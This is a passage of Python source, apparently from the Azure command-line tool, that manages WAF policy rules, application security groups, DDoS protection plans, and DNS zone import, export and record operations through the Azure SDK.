rule = find_child_item(waf_policy, rule_name, path='custom_rules', key_path='name')
waf_policy.custom_rules.remove(rule)
sdk_no_wait(no_wait, client.create_or_update, resource_group_name, policy_name, waf_policy)
# endregion
# region ApplicationGatewayWAFPolicyRuleMatchConditions
def add_waf_custom_rule_match_cond(cmd, client, resource_group_name, policy_name, rule_name,
match_variables, operator, match_values, negation_condition=None, transforms=None):
MatchCondition = cmd.get_models('MatchCondition')
waf_policy = client.get(resource_group_name, policy_name)
custom_rule = find_child_item(waf_policy, rule_name, path='custom_rules', key_path='name')
new_cond = MatchCondition(
match_variables=match_variables,
operator=operator,
match_values=match_values,
        negation_conditon=negation_condition,  # (sic) keyword spelling follows the SDK MatchCondition model
transforms=transforms
)
custom_rule.match_conditions.append(new_cond)
upsert_to_collection(waf_policy, 'custom_rules', custom_rule, 'name', warn=False)
client.create_or_update(resource_group_name, policy_name, waf_policy)
return new_cond
def list_waf_custom_rule_match_cond(cmd, client, resource_group_name, policy_name, rule_name):
waf_policy = client.get(resource_group_name, policy_name)
return find_child_item(waf_policy, rule_name, path='custom_rules', key_path='name').match_conditions
def remove_waf_custom_rule_match_cond(cmd, client, resource_group_name, policy_name, rule_name, index):
waf_policy = client.get(resource_group_name, policy_name)
rule = find_child_item(waf_policy, rule_name, path='custom_rules', key_path='name')
rule.match_conditions.pop(index)
client.create_or_update(resource_group_name, policy_name, waf_policy)
# endregion
# region ApplicationGatewayWAFPolicy ManagedRule ManagedRuleSet
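# add_waf_managed_rule_set merges into the existing managed rules in three tiers: extend the rules
# of an existing rule group, append a new group override to an existing rule set, or (via the
# else-clause on the for loop, which only runs when no rule set matched) append a brand-new rule set.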
def add_waf_managed_rule_set(cmd, client, resource_group_name, policy_name,
rule_set_type, rule_set_version,
rule_group_name=None, rules=None):
"""
    Add a managed rule set to the WAF policy's managed rules.
Visit: https://docs.microsoft.com/en-us/azure/web-application-firewall/ag/application-gateway-crs-rulegroups-rules
"""
ManagedRuleSet, ManagedRuleGroupOverride, ManagedRuleOverride = \
cmd.get_models('ManagedRuleSet', 'ManagedRuleGroupOverride', 'ManagedRuleOverride')
waf_policy = client.get(resource_group_name, policy_name)
managed_rule_overrides = [ManagedRuleOverride(rule_id=r) for r in rules] if rules is not None else []
rule_group_override = None
if rule_group_name is not None:
rule_group_override = ManagedRuleGroupOverride(rule_group_name=rule_group_name,
rules=managed_rule_overrides)
new_managed_rule_set = ManagedRuleSet(rule_set_type=rule_set_type,
rule_set_version=rule_set_version,
rule_group_overrides=[rule_group_override] if rule_group_override is not None else []) # pylint: disable=line-too-long
for rule_set in waf_policy.managed_rules.managed_rule_sets:
if rule_set.rule_set_type == rule_set_type and rule_set.rule_set_version == rule_set_version:
for rule_override in rule_set.rule_group_overrides:
if rule_override.rule_group_name == rule_group_name:
# Add one rule
rule_override.rules.extend(managed_rule_overrides)
break
else:
# Add one rule group
if rule_group_override is not None:
rule_set.rule_group_overrides.append(rule_group_override)
break
else:
# Add new rule set
waf_policy.managed_rules.managed_rule_sets.append(new_managed_rule_set)
return client.create_or_update(resource_group_name, policy_name, waf_policy)
def update_waf_managed_rule_set(cmd, instance, rule_set_type, rule_set_version, rule_group_name=None, rules=None):
"""
    Update (override) an existing rule set in the WAF policy's managed rules.
"""
ManagedRuleSet, ManagedRuleGroupOverride, ManagedRuleOverride = \
cmd.get_models('ManagedRuleSet', 'ManagedRuleGroupOverride', 'ManagedRuleOverride')
managed_rule_overrides = [ManagedRuleOverride(rule_id=r) for r in rules] if rules else None
rule_group_override = ManagedRuleGroupOverride(rule_group_name=rule_group_name,
rules=managed_rule_overrides) if managed_rule_overrides else None
new_managed_rule_set = ManagedRuleSet(rule_set_type=rule_set_type,
rule_set_version=rule_set_version,
rule_group_overrides=[rule_group_override] if rule_group_override is not None else []) # pylint: disable=line-too-long
updated_rule_set = None
for rule_set in instance.managed_rules.managed_rule_sets:
if rule_set.rule_set_type == rule_set_type and rule_set.rule_set_version != rule_set_version:
updated_rule_set = rule_set
break
if rule_set.rule_set_type == rule_set_type and rule_set.rule_set_version == rule_set_version:
if rule_group_name is None:
updated_rule_set = rule_set
break
rg = next((rg for rg in rule_set.rule_group_overrides if rg.rule_group_name == rule_group_name), None)
if rg:
                rg.rules = managed_rule_overrides  # unlike add_waf_managed_rule_set(), replace the existing rules rather than extending them
else:
rule_set.rule_group_overrides.append(rule_group_override)
if updated_rule_set:
instance.managed_rules.managed_rule_sets.remove(updated_rule_set)
instance.managed_rules.managed_rule_sets.append(new_managed_rule_set)
return instance
def remove_waf_managed_rule_set(cmd, client, resource_group_name, policy_name,
rule_set_type, rule_set_version, rule_group_name=None):
"""
    Remove a rule group from a managed rule set if rule_group_name is specified. Otherwise, remove the whole rule set.
"""
waf_policy = client.get(resource_group_name, policy_name)
delete_rule_set = None
for rule_set in waf_policy.managed_rules.managed_rule_sets:
        if rule_set.rule_set_type == rule_set_type and rule_set.rule_set_version == rule_set_version:
if rule_group_name is None:
delete_rule_set = rule_set
break
# Remove one rule from rule group
rg = next((rg for rg in rule_set.rule_group_overrides if rg.rule_group_name == rule_group_name), None)
if rg is None:
raise CLIError('Rule set group [ {} ] not found.'.format(rule_group_name))
rule_set.rule_group_overrides.remove(rg)
if delete_rule_set:
waf_policy.managed_rules.managed_rule_sets.remove(delete_rule_set)
return client.create_or_update(resource_group_name, policy_name, waf_policy)
def list_waf_managed_rule_set(cmd, client, resource_group_name, policy_name):
waf_policy = client.get(resource_group_name, policy_name)
return waf_policy.managed_rules
# endregion
# region ApplicationGatewayWAFPolicy ManagedRule OwaspCrsExclusionEntry
def add_waf_managed_rule_exclusion(cmd, client, resource_group_name, policy_name,
match_variable, selector_match_operator, selector):
OwaspCrsExclusionEntry = cmd.get_models('OwaspCrsExclusionEntry')
exclusion_entry = OwaspCrsExclusionEntry(match_variable=match_variable,
selector_match_operator=selector_match_operator,
selector=selector)
waf_policy = client.get(resource_group_name, policy_name)
waf_policy.managed_rules.exclusions.append(exclusion_entry)
return client.create_or_update(resource_group_name, policy_name, waf_policy)
def remove_waf_managed_rule_exclusion(cmd, client, resource_group_name, policy_name):
waf_policy = client.get(resource_group_name, policy_name)
waf_policy.managed_rules.exclusions = []
return client.create_or_update(resource_group_name, policy_name, waf_policy)
def list_waf_managed_rule_exclusion(cmd, client, resource_group_name, policy_name):
waf_policy = client.get(resource_group_name, policy_name)
return waf_policy.managed_rules
# endregion
# region ApplicationSecurityGroups
def create_asg(cmd, client, resource_group_name, application_security_group_name, location=None, tags=None):
ApplicationSecurityGroup = cmd.get_models('ApplicationSecurityGroup')
asg = ApplicationSecurityGroup(location=location, tags=tags)
return client.begin_create_or_update(resource_group_name, application_security_group_name, asg)
def update_asg(instance, tags=None):
if tags is not None:
instance.tags = tags
return instance
# endregion
# region DdosProtectionPlans
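# When VNets are passed, the DDoS protection plan must exist before they can reference it, so the
# create call is awaited (LongRunningOperation) to obtain the plan ID and each VNet is then updated
# to point at it; without VNets a single PUT is enough.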
def create_ddos_plan(cmd, resource_group_name, ddos_plan_name, location=None, tags=None, vnets=None):
from azure.cli.core.commands import LongRunningOperation
ddos_client = network_client_factory(cmd.cli_ctx).ddos_protection_plans
ddos_protection_plan = cmd.get_models('DdosProtectionPlan')()
if location:
ddos_protection_plan.location = location
if tags:
ddos_protection_plan.tags = tags
if not vnets:
        # if no VNets are specified, a simple PUT is sufficient
return ddos_client.begin_create_or_update(resource_group_name, ddos_plan_name, parameters=ddos_protection_plan)
# if VNETs specified, have to create the protection plan and then add the VNETs
plan_id = LongRunningOperation(cmd.cli_ctx)(
ddos_client.begin_create_or_update(resource_group_name, ddos_plan_name, parameters=ddos_protection_plan)).id
SubResource = cmd.get_models('SubResource')
logger.info('Attempting to attach VNets to newly created DDoS protection plan.')
for vnet_subresource in vnets:
vnet_client = network_client_factory(cmd.cli_ctx).virtual_networks
id_parts = parse_resource_id(vnet_subresource.id)
vnet = vnet_client.get(id_parts['resource_group'], id_parts['name'])
vnet.ddos_protection_plan = SubResource(id=plan_id)
vnet_client.begin_create_or_update(id_parts['resource_group'], id_parts['name'], vnet)
return ddos_client.get(resource_group_name, ddos_plan_name)
def update_ddos_plan(cmd, instance, tags=None, vnets=None):
SubResource = cmd.get_models('SubResource')
if tags is not None:
instance.tags = tags
if vnets is not None:
logger.info('Attempting to update the VNets attached to the DDoS protection plan.')
vnet_ids = set([])
if len(vnets) == 1 and not vnets[0]:
pass
else:
vnet_ids = {x.id for x in vnets}
existing_vnet_ids = {x.id for x in instance.virtual_networks} if instance.virtual_networks else set([])
client = network_client_factory(cmd.cli_ctx).virtual_networks
for vnet_id in vnet_ids.difference(existing_vnet_ids):
logger.info("Adding VNet '%s' to plan.", vnet_id)
id_parts = parse_resource_id(vnet_id)
vnet = client.get(id_parts['resource_group'], id_parts['name'])
vnet.ddos_protection_plan = SubResource(id=instance.id)
client.begin_create_or_update(id_parts['resource_group'], id_parts['name'], vnet)
for vnet_id in existing_vnet_ids.difference(vnet_ids):
logger.info("Removing VNet '%s' from plan.", vnet_id)
id_parts = parse_resource_id(vnet_id)
vnet = client.get(id_parts['resource_group'], id_parts['name'])
vnet.ddos_protection_plan = None
client.begin_create_or_update(id_parts['resource_group'], id_parts['name'], vnet)
return instance
def list_ddos_plans(cmd, resource_group_name=None):
client = network_client_factory(cmd.cli_ctx).ddos_protection_plans
if resource_group_name:
return client.list_by_resource_group(resource_group_name)
return client.list()
# endregion
# region DNS Commands
# add a delegation name server (NS) record for the created child zone in its parent zone.
def add_dns_delegation(cmd, child_zone, parent_zone, child_rg, child_zone_name):
"""
    :param child_zone: the child zone object that was just created.
    :param parent_zone: name or resource ID of the parent zone;
        if only the zone name is given, the current subscription and resource group are assumed.
    :param child_rg: resource group of the child zone.
    :param child_zone_name: name of the child zone.
"""
import sys
from azure.core.exceptions import HttpResponseError
parent_rg = child_rg
parent_subscription_id = None
parent_zone_name = parent_zone
if is_valid_resource_id(parent_zone):
id_parts = parse_resource_id(parent_zone)
parent_rg = id_parts['resource_group']
parent_subscription_id = id_parts['subscription']
parent_zone_name = id_parts['name']
if all([parent_zone_name, parent_rg, child_zone_name, child_zone]) and child_zone_name.endswith(parent_zone_name):
record_set_name = child_zone_name.replace('.' + parent_zone_name, '')
try:
for dname in child_zone.name_servers:
add_dns_ns_record(cmd, parent_rg, parent_zone_name, record_set_name, dname, parent_subscription_id)
            print('Delegation added successfully in \'{}\'\n'.format(parent_zone_name), file=sys.stderr)
except HttpResponseError as ex:
logger.error(ex)
print('Could not add delegation in \'{}\'\n'.format(parent_zone_name), file=sys.stderr)
def create_dns_zone(cmd, client, resource_group_name, zone_name, parent_zone_name=None, tags=None,
if_none_match=False, zone_type='Public', resolution_vnets=None, registration_vnets=None):
Zone = cmd.get_models('Zone', resource_type=ResourceType.MGMT_NETWORK_DNS)
zone = Zone(location='global', tags=tags)
if hasattr(zone, 'zone_type'):
zone.zone_type = zone_type
zone.registration_virtual_networks = registration_vnets
zone.resolution_virtual_networks = resolution_vnets
created_zone = client.create_or_update(resource_group_name, zone_name, zone,
if_none_match='*' if if_none_match else None)
if cmd.supported_api_version(min_api='2016-04-01') and parent_zone_name is not None:
logger.info('Attempting to add delegation in the parent zone')
add_dns_delegation(cmd, created_zone, parent_zone_name, resource_group_name, zone_name)
return created_zone
def update_dns_zone(instance, tags=None, zone_type=None, resolution_vnets=None, registration_vnets=None):
if tags is not None:
instance.tags = tags
if zone_type:
instance.zone_type = zone_type
if resolution_vnets == ['']:
instance.resolution_virtual_networks = None
elif resolution_vnets:
instance.resolution_virtual_networks = resolution_vnets
if registration_vnets == ['']:
instance.registration_virtual_networks = None
elif registration_vnets:
instance.registration_virtual_networks = registration_vnets
return instance
def list_dns_zones(cmd, resource_group_name=None):
ncf = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_NETWORK_DNS).zones
if resource_group_name:
return ncf.list_by_resource_group(resource_group_name)
return ncf.list()
def create_dns_record_set(cmd, resource_group_name, zone_name, record_set_name, record_set_type,
metadata=None, if_match=None, if_none_match=None, ttl=3600, target_resource=None):
RecordSet = cmd.get_models('RecordSet', resource_type=ResourceType.MGMT_NETWORK_DNS)
SubResource = cmd.get_models('SubResource', resource_type=ResourceType.MGMT_NETWORK)
client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_NETWORK_DNS).record_sets
record_set = RecordSet(
ttl=ttl,
metadata=metadata,
target_resource=SubResource(id=target_resource) if target_resource else None
)
return client.create_or_update(resource_group_name, zone_name, record_set_name,
record_set_type, record_set, if_match=if_match,
if_none_match='*' if if_none_match else None)
def list_dns_record_set(client, resource_group_name, zone_name, record_type=None):
if record_type:
return client.list_by_type(resource_group_name, zone_name, record_type)
return client.list_by_dns_zone(resource_group_name, zone_name)
def update_dns_record_set(instance, cmd, metadata=None, target_resource=None):
if metadata is not None:
instance.metadata = metadata
if target_resource == '':
instance.target_resource = None
elif target_resource is not None:
SubResource = cmd.get_models('SubResource')
instance.target_resource = SubResource(id=target_resource)
return instance
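# _type_to_property_name maps a DNS record type to the attribute holding it on the SDK RecordSet
# model, e.g. _type_to_property_name('A') -> 'a_records' and 'CNAME' -> 'cname_record'; SPF records
# are stored alongside TXT records.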
def _type_to_property_name(key):
type_dict = {
'a': 'a_records',
'aaaa': 'aaaa_records',
'caa': 'caa_records',
'cname': 'cname_record',
'mx': 'mx_records',
'ns': 'ns_records',
'ptr': 'ptr_records',
'soa': 'soa_record',
'spf': 'txt_records',
'srv': 'srv_records',
'txt': 'txt_records',
}
return type_dict[key.lower()]
def export_zone(cmd, resource_group_name, zone_name, file_name=None):
from time import localtime, strftime
client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_NETWORK_DNS)
record_sets = client.record_sets.list_by_dns_zone(resource_group_name, zone_name)
zone_obj = OrderedDict({
'$origin': zone_name.rstrip('.') + '.',
'resource-group': resource_group_name,
'zone-name': zone_name.rstrip('.'),
'datetime': strftime('%a, %d %b %Y %X %z', localtime())
})
for record_set in record_sets:
record_type = record_set.type.rsplit('/', 1)[1].lower()
record_set_name = record_set.name
record_data = getattr(record_set, _type_to_property_name(record_type), None)
# ignore empty record sets
if not record_data:
continue
if not isinstance(record_data, list):
record_data = [record_data]
if record_set_name not in zone_obj:
zone_obj[record_set_name] = OrderedDict()
for record in record_data:
record_obj = {'ttl': record_set.ttl}
if record_type not in zone_obj[record_set_name]:
zone_obj[record_set_name][record_type] = []
if record_type == 'aaaa':
record_obj.update({'ip': record.ipv6_address})
elif record_type == 'a':
record_obj.update({'ip': record.ipv4_address})
elif record_type == 'caa':
record_obj.update({'val': record.value, 'tag': record.tag, 'flags': record.flags})
elif record_type == 'cname':
record_obj.update({'alias': record.cname.rstrip('.') + '.'})
elif record_type == 'mx':
record_obj.update({'preference': record.preference, 'host': record.exchange.rstrip('.') + '.'})
elif record_type == 'ns':
record_obj.update({'host': record.nsdname.rstrip('.') + '.'})
elif record_type == 'ptr':
record_obj.update({'host': record.ptrdname.rstrip('.') + '.'})
elif record_type == 'soa':
record_obj.update({
'mname': record.host.rstrip('.') + '.',
'rname': record.email.rstrip('.') + '.',
'serial': int(record.serial_number), 'refresh': record.refresh_time,
'retry': record.retry_time, 'expire': record.expire_time,
'minimum': record.minimum_ttl
})
zone_obj['$ttl'] = record.minimum_ttl
elif record_type == 'srv':
record_obj.update({'priority': record.priority, 'weight': record.weight,
'port': record.port, 'target': record.target.rstrip('.') + '.'})
elif record_type == 'txt':
record_obj.update({'txt': ''.join(record.value)})
zone_obj[record_set_name][record_type].append(record_obj)
zone_file_content = make_zone_file(zone_obj)
print(zone_file_content)
if file_name:
try:
with open(file_name, 'w') as f:
f.write(zone_file_content)
except IOError:
raise CLIError('Unable to export to file: {}'.format(file_name))
# pylint: disable=too-many-return-statements, inconsistent-return-statements
def _build_record(cmd, data):
AaaaRecord, ARecord, CaaRecord, CnameRecord, MxRecord, NsRecord, PtrRecord, SoaRecord, SrvRecord, TxtRecord = \
cmd.get_models('AaaaRecord', 'ARecord', 'CaaRecord', 'CnameRecord', 'MxRecord', 'NsRecord',
'PtrRecord', 'SoaRecord', 'SrvRecord', 'TxtRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record_type = data['delim'].lower()
try:
if record_type == 'aaaa':
return AaaaRecord(ipv6_address=data['ip'])
if record_type == 'a':
return ARecord(ipv4_address=data['ip'])
if (record_type == 'caa' and
supported_api_version(cmd.cli_ctx, ResourceType.MGMT_NETWORK_DNS, min_api='2018-03-01-preview')):
return CaaRecord(value=data['val'], flags=int(data['flags']), tag=data['tag'])
if record_type == 'cname':
return CnameRecord(cname=data['alias'])
if record_type == 'mx':
return MxRecord(preference=data['preference'], exchange=data['host'])
if record_type == 'ns':
return NsRecord(nsdname=data['host'])
if record_type == 'ptr':
return PtrRecord(ptrdname=data['host'])
if record_type == 'soa':
return SoaRecord(host=data['host'], email=data['email'], serial_number=data['serial'],
refresh_time=data['refresh'], retry_time=data['retry'], expire_time=data['expire'],
minimum_ttl=data['minimum'])
if record_type == 'srv':
return SrvRecord(
priority=int(data['priority']), weight=int(data['weight']), port=int(data['port']),
target=data['target'])
if record_type in ['txt', 'spf']:
text_data = data['txt']
return TxtRecord(value=text_data) if isinstance(text_data, list) else TxtRecord(value=[text_data])
except KeyError as ke:
raise CLIError("The {} record '{}' is missing a property. {}"
.format(record_type, data['name'], ke))
# pylint: disable=too-many-statements
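# import_zone parses the zone file, groups entries into record sets keyed by record name + type,
# creates the zone, then pushes each record set. The root '@' SOA and NS sets are not replaced:
# the SOA keeps Azure's host name and the NS set keeps Azure's name servers (only the TTL is taken
# from the imported file).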
def import_zone(cmd, resource_group_name, zone_name, file_name):
from azure.cli.core.util import read_file_content
from azure.core.exceptions import HttpResponseError
import sys
logger.warning("In the future, zone name will be case insensitive.")
RecordSet = cmd.get_models('RecordSet', resource_type=ResourceType.MGMT_NETWORK_DNS)
from azure.cli.core.azclierror import FileOperationError, UnclassifiedUserFault
try:
file_text = read_file_content(file_name)
except FileNotFoundError:
raise FileOperationError("No such file: " + str(file_name))
except IsADirectoryError:
raise FileOperationError("Is a directory: " + str(file_name))
except PermissionError:
raise FileOperationError("Permission denied: " + str(file_name))
except OSError as e:
raise UnclassifiedUserFault(e)
zone_obj = parse_zone_file(file_text, zone_name)
origin = zone_name
record_sets = {}
for record_set_name in zone_obj:
for record_set_type in zone_obj[record_set_name]:
record_set_obj = zone_obj[record_set_name][record_set_type]
if record_set_type == 'soa':
origin = record_set_name.rstrip('.')
if not isinstance(record_set_obj, list):
record_set_obj = [record_set_obj]
for entry in record_set_obj:
record_set_ttl = entry['ttl']
record_set_key = '{}{}'.format(record_set_name.lower(), record_set_type)
record = _build_record(cmd, entry)
if not record:
logger.warning('Cannot import %s. RecordType is not found. Skipping...', entry['delim'].lower())
continue
record_set = record_sets.get(record_set_key, None)
if not record_set:
# Workaround for issue #2824
relative_record_set_name = record_set_name.rstrip('.')
if not relative_record_set_name.endswith(origin):
logger.warning(
'Cannot import %s. Only records relative to origin may be '
'imported at this time. Skipping...', relative_record_set_name)
continue
record_set = RecordSet(ttl=record_set_ttl)
record_sets[record_set_key] = record_set
_add_record(record_set, record, record_set_type,
is_list=record_set_type.lower() not in ['soa', 'cname'])
total_records = 0
for key, rs in record_sets.items():
rs_name, rs_type = key.lower().rsplit('.', 1)
rs_name = rs_name[:-(len(origin) + 1)] if rs_name != origin else '@'
try:
record_count = len(getattr(rs, _type_to_property_name(rs_type)))
except TypeError:
record_count = 1
total_records += record_count
cum_records = 0
client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_NETWORK_DNS)
print('== BEGINNING ZONE IMPORT: {} ==\n'.format(zone_name), file=sys.stderr)
Zone = cmd.get_models('Zone', resource_type=ResourceType.MGMT_NETWORK_DNS)
client.zones.create_or_update(resource_group_name, zone_name, Zone(location='global'))
for key, rs in record_sets.items():
rs_name, rs_type = key.lower().rsplit('.', 1)
rs_name = '@' if rs_name == origin else rs_name
if rs_name.endswith(origin):
rs_name = rs_name[:-(len(origin) + 1)]
try:
record_count = len(getattr(rs, _type_to_property_name(rs_type)))
except TypeError:
record_count = 1
if rs_name == '@' and rs_type == 'soa':
root_soa = client.record_sets.get(resource_group_name, zone_name, '@', 'SOA')
rs.soa_record.host = root_soa.soa_record.host
rs_name = '@'
elif rs_name == '@' and rs_type == 'ns':
root_ns = client.record_sets.get(resource_group_name, zone_name, '@', 'NS')
root_ns.ttl = rs.ttl
rs = root_ns
rs_type = rs.type.rsplit('/', 1)[1]
try:
client.record_sets.create_or_update(
resource_group_name, zone_name, rs_name, rs_type, rs)
cum_records += record_count
print("({}/{}) Imported {} records of type '{}' and name '{}'"
.format(cum_records, total_records, record_count, rs_type, rs_name), file=sys.stderr)
except HttpResponseError as ex:
logger.error(ex)
print("\n== {}/{} RECORDS IMPORTED SUCCESSFULLY: '{}' =="
.format(cum_records, total_records, zone_name), file=sys.stderr)
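# The add_dns_*_record helpers below all delegate to _add_save_record, which merges the new record
# into any existing record set of the same name and type (creating the set if needed). Hypothetical
# CLI example: az network dns record-set a add-record -g MyRG -z example.com -n www -a 10.0.0.4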
def add_dns_aaaa_record(cmd, resource_group_name, zone_name, record_set_name, ipv6_address,
ttl=3600, if_none_match=None):
AaaaRecord = cmd.get_models('AaaaRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = AaaaRecord(ipv6_address=ipv6_address)
record_type = 'aaaa'
return _add_save_record(cmd, record, record_type, record_set_name, resource_group_name, zone_name,
ttl=ttl, if_none_match=if_none_match)
def add_dns_a_record(cmd, resource_group_name, zone_name, record_set_name, ipv4_address,
ttl=3600, if_none_match=None):
ARecord = cmd.get_models('ARecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = ARecord(ipv4_address=ipv4_address)
record_type = 'a'
    return _add_save_record(cmd, record, record_type, record_set_name, resource_group_name, zone_name,
                            ttl=ttl, if_none_match=if_none_match)
def add_dns_caa_record(cmd, resource_group_name, zone_name, record_set_name, value, flags, tag,
ttl=3600, if_none_match=None):
CaaRecord = cmd.get_models('CaaRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = CaaRecord(flags=flags, tag=tag, value=value)
record_type = 'caa'
return _add_save_record(cmd, record, record_type, record_set_name, resource_group_name, zone_name,
ttl=ttl, if_none_match=if_none_match)
def add_dns_cname_record(cmd, resource_group_name, zone_name, record_set_name, cname, ttl=3600, if_none_match=None):
CnameRecord = cmd.get_models('CnameRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = CnameRecord(cname=cname)
record_type = 'cname'
return _add_save_record(cmd, record, record_type, record_set_name, resource_group_name, zone_name,
is_list=False, ttl=ttl, if_none_match=if_none_match)
def add_dns_mx_record(cmd, resource_group_name, zone_name, record_set_name, preference, exchange,
ttl=3600, if_none_match=None):
MxRecord = cmd.get_models('MxRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = MxRecord(preference=int(preference), exchange=exchange)
record_type = 'mx'
return _add_save_record(cmd, record, record_type, record_set_name, resource_group_name, zone_name,
ttl=ttl, if_none_match=if_none_match)
def add_dns_ns_record(cmd, resource_group_name, zone_name, record_set_name, dname,
subscription_id=None, ttl=3600, if_none_match=None):
NsRecord = cmd.get_models('NsRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = NsRecord(nsdname=dname)
record_type = 'ns'
return _add_save_record(cmd, record, record_type, record_set_name, resource_group_name, zone_name,
subscription_id=subscription_id, ttl=ttl, if_none_match=if_none_match)
def add_dns_ptr_record(cmd, resource_group_name, zone_name, record_set_name, dname, ttl=3600, if_none_match=None):
PtrRecord = cmd.get_models('PtrRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = PtrRecord(ptrdname=dname)
record_type = 'ptr'
return _add_save_record(cmd, record, record_type, record_set_name, resource_group_name, zone_name,
ttl=ttl, if_none_match=if_none_match)
def update_dns_soa_record(cmd, resource_group_name, zone_name, host=None, email=None,
serial_number=None, refresh_time=None, retry_time=None, expire_time=None,
minimum_ttl=3600, if_none_match=None):
record_set_name = '@'
record_type = 'soa'
ncf = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_NETWORK_DNS).record_sets
record_set = ncf.get(resource_group_name, zone_name, record_set_name, record_type)
record = record_set.soa_record
record.host = host or record.host
record.email = email or record.email
record.serial_number = serial_number or record.serial_number
record.refresh_time = refresh_time or record.refresh_time
record.retry_time = retry_time or record.retry_time
record.expire_time = expire_time or record.expire_time
record.minimum_ttl = minimum_ttl or record.minimum_ttl
return _add_save_record(cmd, record, record_type, record_set_name, resource_group_name, zone_name,
is_list=False, if_none_match=if_none_match)
def add_dns_srv_record(cmd, resource_group_name, zone_name, record_set_name, priority, weight,
port, target, if_none_match=None):
SrvRecord = cmd.get_models('SrvRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = SrvRecord(priority=priority, weight=weight, port=port, target=target)
record_type = 'srv'
return _add_save_record(cmd, record, record_type, record_set_name, resource_group_name, zone_name,
if_none_match=if_none_match)
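# DNS TXT values are limited to 255-character strings, so add_dns_txt_record splits longer input
# into 255-character chunks before saving; the assert below only checks that no characters are lost.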
def add_dns_txt_record(cmd, resource_group_name, zone_name, record_set_name, value, if_none_match=None):
TxtRecord = cmd.get_models('TxtRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = TxtRecord(value=value)
record_type = 'txt'
long_text = ''.join(x for x in record.value)
original_len = len(long_text)
record.value = []
while len(long_text) > 255:
record.value.append(long_text[:255])
long_text = long_text[255:]
record.value.append(long_text)
final_str = ''.join(record.value)
final_len = len(final_str)
assert original_len == final_len
return _add_save_record(cmd, record, record_type, record_set_name, resource_group_name, zone_name,
if_none_match=if_none_match)
def remove_dns_aaaa_record(cmd, resource_group_name, zone_name, record_set_name, ipv6_address,
keep_empty_record_set=False):
AaaaRecord = cmd.get_models('AaaaRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = AaaaRecord(ipv6_address=ipv6_address)
record_type = 'aaaa'
return _remove_record(cmd.cli_ctx, record, record_type, record_set_name, resource_group_name, zone_name,
keep_empty_record_set=keep_empty_record_set)
def remove_dns_a_record(cmd, resource_group_name, zone_name, record_set_name, ipv4_address,
keep_empty_record_set=False):
ARecord = cmd.get_models('ARecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = ARecord(ipv4_address=ipv4_address)
record_type = 'a'
return _remove_record(cmd.cli_ctx, record, record_type, record_set_name, resource_group_name, zone_name,
keep_empty_record_set=keep_empty_record_set)
def remove_dns_caa_record(cmd, resource_group_name, zone_name, record_set_name, value,
flags, tag, keep_empty_record_set=False):
CaaRecord = cmd.get_models('CaaRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = CaaRecord(flags=flags, tag=tag, value=value)
record_type = 'caa'
return _remove_record(cmd.cli_ctx, record, record_type, record_set_name, resource_group_name, zone_name,
keep_empty_record_set=keep_empty_record_set)
def remove_dns_cname_record(cmd, resource_group_name, zone_name, record_set_name, cname,
keep_empty_record_set=False):
CnameRecord = cmd.get_models('CnameRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = CnameRecord(cname=cname)
record_type = 'cname'
return _remove_record(cmd.cli_ctx, record, record_type, record_set_name, resource_group_name, zone_name,
is_list=False, keep_empty_record_set=keep_empty_record_set)
def remove_dns_mx_record(cmd, resource_group_name, zone_name, record_set_name, preference, exchange,
keep_empty_record_set=False):
MxRecord = cmd.get_models('MxRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = MxRecord(preference=int(preference), exchange=exchange)
record_type = 'mx'
return _remove_record(cmd.cli_ctx, record, record_type, record_set_name, resource_group_name, zone_name,
keep_empty_record_set=keep_empty_record_set)
def remove_dns_ns_record(cmd, resource_group_name, zone_name, record_set_name, dname,
keep_empty_record_set=False):
NsRecord = cmd.get_models('NsRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = NsRecord(nsdname=dname)
record_type = 'ns'
return _remove_record(cmd.cli_ctx, record, record_type, record_set_name, resource_group_name, zone_name,
keep_empty_record_set=keep_empty_record_set)
def remove_dns_ptr_record(cmd, resource_group_name, zone_name, record_set_name, dname,
keep_empty_record_set=False):
PtrRecord = cmd.get_models('PtrRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = PtrRecord(ptrdname=dname)
record_type = 'ptr'
return _remove_record(cmd.cli_ctx, record, record_type, record_set_name, resource_group_name, zone_name,
keep_empty_record_set=keep_empty_record_set)
def remove_dns_srv_record(cmd, resource_group_name, zone_name, record_set_name, priority, weight,
port, target, keep_empty_record_set=False):
SrvRecord = cmd.get_models('SrvRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = SrvRecord(priority=priority, weight=weight, port=port, target=target)
record_type = 'srv'
return _remove_record(cmd.cli_ctx, record, record_type, record_set_name, resource_group_name, zone_name,
keep_empty_record_set=keep_empty_record_set)
def remove_dns_txt_record(cmd, resource_group_name, zone_name, record_set_name, value,
keep_empty_record_set=False):
TxtRecord = cmd.get_models('TxtRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = TxtRecord(value=value)
record_type = 'txt'
return _remove_record(cmd.cli_ctx, record, record_type, record_set_name, resource_group_name, zone_name,
keep_empty_record_set=keep_empty_record_set)
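# The _check_*_record_exist helpers implement per-type value equality. _add_record looks the right
# one up by name via _record_exist_func (a globals() lookup) to avoid appending duplicate records
# to an existing record set.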
def _check_a_record_exist(record, exist_list):
for r in exist_list:
if r.ipv4_address == record.ipv4_address:
return True
return False
def _check_aaaa_record_exist(record, exist_list):
for r in exist_list:
if r.ipv6_address == record.ipv6_address:
return True
return False
def _check_caa_record_exist(record, exist_list):
for r in exist_list:
